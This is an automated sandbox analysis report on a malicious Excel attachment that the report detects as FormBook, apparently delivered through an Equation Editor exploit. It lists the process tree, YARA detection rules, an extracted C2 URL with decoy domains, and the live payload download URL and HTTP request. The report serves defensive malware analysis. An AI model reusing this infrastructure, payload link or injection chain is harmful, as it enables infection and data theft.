Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BON DE COMMANDE POUR CHENOUFI AEK.xlsx

Overview

General Information

Sample Name:BON DE COMMANDE POUR CHENOUFI AEK.xlsx
Analysis ID:626175
MD5:981661fb35d158853f012f21aadd7b92
SHA1:2ce93cbf7651c472a598b8756f5301275d95e27f
SHA256:3084b6d063c6ec61503e90e6f2c61830ec915593fed9ddc719f67bc1ec24b49a
Tags:VelvetSweatshopxlsx
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2644 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 900 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2520 cmdline: "C:\Users\Public\vbc.exe" MD5: 5AF1C7DD89A535DEE51C3E28B4A74F8D)
      • bmexo.exe (PID: 1224 cmdline: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya MD5: FD42CBBC6D53AD34694C46731AABD852)
        • bmexo.exe (PID: 1820 cmdline: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya MD5: FD42CBBC6D53AD34694C46731AABD852)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • chkdsk.exe (PID: 792 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: A01E18A156825557A24A643A2547AA8C)
              • cmd.exe (PID: 2972 cmdline: /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup
{"C2 list": ["www.freerenoadvice.com/ud5f/"], "decoy": ["makcoll.com", "mitrachocloud.com", "finikilspase.site", "vertriebmitherz.gmbh", "terapiasdelsinuips.com", "schoolmink.online", "slotgacor588.xyz", "zkf-lawyer.com", "daskocleaning.com", "baoxin-design.com", "hollywoodcuts.net", "animefnix.com", "trinityhomesolutionsok.com", "cfrhsw.xyz", "articrowd.com", "jlivingfurniture.com", "marmolsystem.com", "nudehack.com", "beam-birds.com", "cravensoft.com", "bjyunjian.com", "naturelleclub.com", "reece-family.net", "morarmail.com", "morgantownpet.supply", "recordanalytics.com", "factheat.online", "mcgillinvestigation.com", "tinyhouse.contact", "gpbrasilia.com", "jacobsclub.com", "theboemia.net", "balifoodfun.com", "alfonshotel.com", "spaceokara.com", "paraphras.com", "ruibaituobj.com", "rwbbrwe1.com", "turkishrepublik.com", "costumeshop.xyz", "minatexacess.com", "hathor-network.net", "02d1qp.xyz", "dadagrin.com", "lfsijin.com", "bupabii.site", "mydiga-angststoerung.com", "hayatseventeknoloji.com", "adv-cleaner.site", "ndsnus.com", "rebeccabarclaylpc.com", "eswpu.com", "babbleboat.com", "zvmsovsg.com", "quantumlab5.com", "venerems.com", "sh09.fyi", "maxpilesclinic.com", "luigilucioni.com", "yuttie.store", "tripnii.com", "topings33.com", "madetopraisehim.com", "tesladoge.info"]}
SourceRuleDescriptionAuthorStrings
00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18809:$sqlite3step: 68 34 1C 7B E1
    • 0x1891c:$sqlite3step: 68 34 1C 7B E1
    • 0x18838:$sqlite3text: 68 38 2A 90 C5
    • 0x1895d:$sqlite3text: 68 38 2A 90 C5
    • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries
      SourceRuleDescriptionAuthorStrings
      6.0.bmexo.exe.400000.7.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.0.bmexo.exe.400000.7.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.0.bmexo.exe.400000.7.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18809:$sqlite3step: 68 34 1C 7B E1
        • 0x1891c:$sqlite3step: 68 34 1C 7B E1
        • 0x18838:$sqlite3text: 68 38 2A 90 C5
        • 0x1895d:$sqlite3text: 68 38 2A 90 C5
        • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
        6.0.bmexo.exe.400000.7.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.0.bmexo.exe.400000.7.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bc8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 20 entries

          Exploits

          barindex
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.156.91.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 900, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 900, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.freerenoadvice.com/ud5f/"], "decoy": ["makcoll.com", "mitrachocloud.com", "finikilspase.site", "vertriebmitherz.gmbh", "terapiasdelsinuips.com", "schoolmink.online", "slotgacor588.xyz", "zkf-lawyer.com", "daskocleaning.com", "baoxin-design.com", "hollywoodcuts.net", "animefnix.com", "trinityhomesolutionsok.com", "cfrhsw.xyz", "articrowd.com", "jlivingfurniture.com", "marmolsystem.com", "nudehack.com", "beam-birds.com", "cravensoft.com", "bjyunjian.com", "naturelleclub.com", "reece-family.net", "morarmail.com", "morgantownpet.supply", "recordanalytics.com", "factheat.online", "mcgillinvestigation.com", "tinyhouse.contact", "gpbrasilia.com", "jacobsclub.com", "theboemia.net", "balifoodfun.com", "alfonshotel.com", "spaceokara.com", "paraphras.com", "ruibaituobj.com", "rwbbrwe1.com", "turkishrepublik.com", "costumeshop.xyz", "minatexacess.com", "hathor-network.net", "02d1qp.xyz", "dadagrin.com", "lfsijin.com", "bupabii.site", "mydiga-angststoerung.com", "hayatseventeknoloji.com", "adv-cleaner.site", "ndsnus.com", "rebeccabarclaylpc.com", "eswpu.com", "babbleboat.com", "zvmsovsg.com", "quantumlab5.com", "venerems.com", "sh09.fyi", "maxpilesclinic.com", "luigilucioni.com", "yuttie.store", "tripnii.com", "topings33.com", "madetopraisehim.com", "tesladoge.info"]}
          Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsxVirustotal: Detection: 38%Perma Link
          Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsxReversingLabs: Detection: 26%
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://103.156.91.153/fdcloudfiles/vbc.exeAvira URL Cloud: Label: malware
          Source: www.freerenoadvice.com/ud5f/Avira URL Cloud: Label: malware
          Source: http://103.156.91.153/fdcloudfiles/vbc.exeVirustotal: Detection: 10%Perma Link
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
          Source: 6.0.bmexo.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.bmexo.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.bmexo.exe.170000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.bmexo.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.bmexo.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits

          barindex
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 103.156.91.153 Port: 80
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\wxiwy\cojnmd\dyrz\70c437f178a447d5b5e03abf78ad86d5\khqwan\zzevlnko\Release\zzevlnko.pdb source: vbc.exe, 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp, bmexo.exe, 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000005.00000000.968231879.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000006.00000000.974589862.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, chkdsk.exe, 00000008.00000002.1174039918.0000000002887000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173217045.00000000003B3000.00000004.00000020.00020000.00000000.sdmp, nsmD99.tmp.4.dr, bmexo.exe.4.dr
          Source: Binary string: chkdsk.pdb source: bmexo.exe, 00000006.00000002.1050114953.0000000000030000.00000040.10000000.00040000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050401037.0000000000714000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: bmexo.exe, bmexo.exe, 00000006.00000003.981359909.0000000000800000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000003.979000602.00000000002B0000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1051582479.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000008.00000002.1173724762.0000000002500000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1050200391.0000000002090000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1051411235.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004069A4 FindFirstFileW,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,

          Software Vulnerabilities

          barindex
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D056C ShellExecuteExW,ExitProcess,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D048A LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D0555 ShellExecuteExW,ExitProcess,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D03FE URLDownloadToFileW,ShellExecuteExW,ExitProcess,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D03E5 ExitProcess,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D041A URLDownloadToFileW,ShellExecuteExW,ExitProcess,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D058A ExitProcess,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D04A4 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop ebx
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 103.156.91.153:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 103.156.91.153:80

          Networking

          barindex
          Source: Malware configuration extractorURLs: www.freerenoadvice.com/ud5f/
          Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 15:07:42 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Fri, 13 May 2022 06:57:17 GMTETag: "40667-5dedf2f5fd4c5"Accept-Ranges: bytesContent-Length: 263783Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /fdcloudfiles/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.156.91.153Connection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
